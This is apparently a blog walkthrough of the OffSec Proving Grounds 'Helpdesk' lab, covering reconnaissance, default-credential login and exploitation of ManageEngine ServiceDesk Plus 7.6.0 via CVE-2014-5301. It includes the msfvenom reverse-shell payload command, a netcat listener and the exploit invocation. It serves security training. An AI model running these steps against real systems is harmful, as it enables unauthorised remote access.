top of page
Search
pragmat1c0n3
Nov 18, 20246 min read

Offensive-S3c: Helpdesk - OffSec PG

Updated: Dec 9, 2024

<Introduction>


Hey all, I wrote this detailed walk-through of the OffSec Proving Grounds Helpdesk vulnerable host. In this blog post, I delve into the steps from reconnaissance to post-exploitation, showcasing the tools and techniques used to exploit this vulnerable host.



<What’s Covered>

This walk-through covers the entire process from reconnaissance to post-exploitation. You'll learn how to perform:

  • Port Scanning

  • Service Enumeration

  • Directory Traversal

  • Arbitrary File Upload


By the end of this guide, you’ll have a clear understanding of how to approach and exploit similar vulnerable hosts.


If you find this content informative and you are interested in cybersecurity, please regularly check back on Cyb3r-S3c for new content. Also, for more free content please like and subscribe to the Cyb3r-0verwatch channel.

 


<OVERVIEW>

Helpdesk is a vulnerable host created by Offsec to allow users to practice ethical hacking techniques. This virtual machine is downloadable from VulnHub and also accessible from the OffSec Proving Grounds virtual training lab. Helpdesk is affected by several vulnerabilities, including:

  • Identification and Authentication Failures due to default credentials

  • Directory Traversal

  • Arbitrary File Upload

  • Security Misconfiguration due to ServiceDesk running as 'System'



<Recon: Enumerating What is Running>

First, I booted up the Helpdesk host, which was assigned an IP address as shown in the image above. The initial phase focused on information gathering using Nmap to identify open ports and services.


Nmap is one of the primary tools I use for initial information gathering. The following Nmap command was used to discover open ports and services on the target host:

-sS: Runs stealth (half-open) scan.
-A: Performs an aggressive scan on a target. It includes, port scanning, OS detection, version detection, and script scanning.
-p-: Scans all 65,535 ports.
-T4: Defines the timing template used for the scan.

<Recon: Analyzing the Results>


Analyzing the scan results, Nmap detected open ports that suggest that the vulnerable host is running Windows, with potential services like Microsoft Windows SMB/NetBIOs/RDP and ManageEngine ServiceDesk Plus. The Nmap scan results detected open ports:


Port 135 (RPC): Remote Procedure Call service.
Port 139 (NetBIOS): Network Basic Input/Output System service.
Port 445 (SMB): Server Message Block protocol, used for file sharing.
Port 3389 (RDP): Remote Desktop Protocol.
Port 8080 (HTTP): Running ManageEngine ServiceDesk Plus.

Based on the OS detection, CPE values, and service banners, it was evident that the target is a Windows Server 2008 Standard machine. This conclusion was based on the following:

  • The OS type detected by Nmap.

  • CPE (Common Platform Enumeration) values.

  • Service banners.

  • SMB script output suggesting Windows Server 2008 Standard.


After reviewing the results, the first service I focused on was port 8080, which appeared to be running ManageEngine ServiceDesk Plus.


I navigated to the web interface at http://10.10.10.10:8080 to do a little more information gathering. The ManageEngine ServiceDesk Plus login displayed after the page loaded. Reviewing the page, version 7.6.0 was visible.



<Recon: Investigating the Web Application>


Knowing that many commercial off-the-shelf (COTS) software have default credentials, I searched for the default login credentials for ServiceDesk Plus. Google revealed that the default credentials are 'administrator'/'administrator'.


Using the default credentials 'administrator'/'administrator' allowed me to login to ServiceDesk Plus. This is an indication of a security misconfiguration or identification and authentication failures because default credentials are enabled and usable. I did not see much I could do navigating through the web-gui.



<Exploitation: Exploit Search and Execution Failure>


searchsploit manageengine servicedesk plus 7.6.0

I decided to run the following Searchsploit command shown in the CLI to verify whether there was a Servicedesk Plus exploit available locally. The output showed a promising exploit that appeared to be a SQL injection attack.


searchsploit -m 11793

I ran the following Searchsploit command shown in the CLI MSSQL. The output shows the link to the ExploitDB page, where the script is located on Kali, and also copies over the script to your current directory. Which is currently the downloads folder.


The exploit text file provides general information about the vulnerability, affected versions and platforms, severity, and security researcher to name a few items. The exploit file also provides a proof of concept for executing the SQL injection. It provides methods for a target host running windows with MySQL, a target host running windows with MSSQL, and a target host running Linux with MySQL


I attempted to run the POC for Windows with MSSQL as shown in the address bar, but it failed. Based on the output I just validated that the target host is a Windows server running MySQL. Instead of attempting the other method for Windows hosts running MySQL I decided to google for other options.



<Recon: A Search Renewed>

 

I googled “manageengine servicedesk plus 7.6.0 exploit” and Google showed a few possible exploits. I went ahead and reviewed the first result on the list.


When I clicked the link it brought me to the CVE-2014-5301 Python exploit script. A closer review confirmed that the script targets version 7.6.0 of the ServiceDesk Plus application, which matches the version running on the target host. The exploit script leverages a directory traversal vulnerability and includes a reference to CVE Details via a provided 'CVEdetails' URL for further information.


Further analysis of the script revealed instructions for creating a Msfvenom payload. It offers the option to generate a reverse TCP shell, allowing you to choose between a Meterpreter payload or a standard reverse TCP shell.


The script also provides instructions for starting a listener prior to executing the exploit script. For this demonstration I will use Netcat as my listener instead of Meterpreter.


Finally the script provides the format necessary to execute the script successfully. Including adding the target host IP, target host port in this case 8080, username, password (in this case I will use the default administrator credentials I discovered initially) and the WAR file that was generated with Msfvenom. If you review the script the author does a great job commenting on the different sections of the script.



<Exploitation: Gaining Access>


First thing I did was copy the URL from the Github page then ran the following Wget command shown in the CLI to download the exploit script.

mv CVE-2014-5301.py sd_plus.py

I then ran the following command shown in the CLI to rename the exploit.

 

chmod 777 sd_plus.py

I ran the following 'chmod' command shown in the CLI to make the script executable.


msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Kali IP> LPORT=<Listening Port> -f war > revshell.war

With the script downloaded, using the following Msfvenom command shown in the CLI, I generated the WAR file needed for the exploit to work.


nc -lvnp 1234

Using the following Netcat command shown in the CLI, I ran my Netcat listener to hopefully catch a shell from the target host.


python3 ./sd_plus.py <IP><Port> administrator administrator revshell.war

With everything all set, I ran the exploit as shown in the CLI. Based on the output it looks like it at least attempted a session with the target host.

 

Looking at my Netcat listener, it looks like I caught a shell.



<Post-Exploitation: I Am Root>


When I run the 'whoami' command it shows that I am the system account. 


I ran the following command shown in the CLI to change directories to the 'Users' folder and 'dir' command to see what user folders were available. The only user folder that interests me is the 'Administrator' folder.


I ran the following commands shown in the CLI to change directories to the 'Administrator' folder and see the contents. The root flag will more than likely be in the 'Desktop' folder.


I ran the following commands shown in the CLI to change directories to the 'Desktop' folder and see the contents. Looking at the output I can see the 'proof.txt' containing the root flag.


type proof.txt

I ran the following command shown in the CLI to read the 'proof.txt' contents. And with that, I have completed the vulnerable host.



 </CONCLUSION>

To conclude this blog post, Using a variety of techniques, I was able to go from reconnaissance to gaining root privileges on Helpdesk. Performing these steps allowed me to gather the information needed to gain a foothold on the target host. Upon gaining access, there was no need to escalate my privileges because ServiceDesk was running as 'System'. This allowed me to easily obtain the flag from the 'proof.txt' file located in the Administrator's user folder.


Thank you for reading the OffSec Proving Grounds Helpdesk vulnerable host walkthrough. If you find this content informative and you are interested in cybersecurity please regularly check back on the Cyb3r-S3c website for updates. Also for more free content. please like and subscribe to the Cyb3r-0verwatch channel. 


/Signing off,

Pragmat1c_0n3

 


 


0 views0 comments

Recent Posts

See All

Kommentare

bottom of page